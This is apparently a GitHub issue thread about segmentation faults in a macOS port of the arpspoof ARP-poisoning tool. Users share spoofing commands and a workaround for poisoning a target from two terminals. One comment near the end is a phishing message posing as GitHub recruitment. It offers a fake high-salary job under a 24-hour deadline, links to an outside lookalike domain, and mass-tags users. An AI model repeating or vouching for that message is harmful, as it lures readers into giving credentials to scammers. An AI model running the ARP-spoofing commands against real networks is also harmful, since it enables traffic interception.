### ISSUE TITLE
Segmentation fault error when using the utility

### ISSUE THREAD

**Issue by musa11971** [YeautyYE/arpspoof#1]
Hi,

Once I follow all the installation steps and try to use the utility, I get the following error:

`[1]    36023 segmentation fault  sudo arpspoof -i en01 -c both -t [target_ip_here] [gateway_ip_here]`

Command used: `sudo arpspoof -i en01 -c both -t [target_ip_here] [gateway_ip_here]`

Is this an issue with the new macOS version?

**Comment by YeautyYE** [comment]
What's your version?
My version is 12.1 and I don't have this problem

**Comment by dehness** [comment]
Didn't know if I should post in this thread or open a new one but I too get segmentation fault (using en0) running macOS 12.3.1.

**Comment by cszmzh** [comment]
I have the same problem.
macOS version: 12.6.5(Apple M1 Pro)

[1]    37565 segmentation fault  arpspoof -i en0 -t ...... -r ......

**Comment by YeautyYE** [comment]
I tried to run it with a new MBP and still did not have this problem
version : 13.2

**Comment by YeautyYE** [comment]
If you run the command `sudo arpspoof`, whether the software version is returned

**Comment by newpond** [comment]
for me I removed the -r option and the problem went away.
you will how ever have to run the program in 2 terminal windows simultaneously to poison the target as well

**Comment by dwcooper** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
biel-justin, @M5main, @chikaku, @edddyguo, @sgkokocool1, @langligelang, @ttupupa, @yuankongzhe, @truetailplayer, @greatpie, @wafeishushu, @RENGELETH, @Pig-sudo, @yuyulklk, @LixuanLabs, @cnxzcxy, @duqingwei, @mameikagou, @DoveAz, @DryTofu
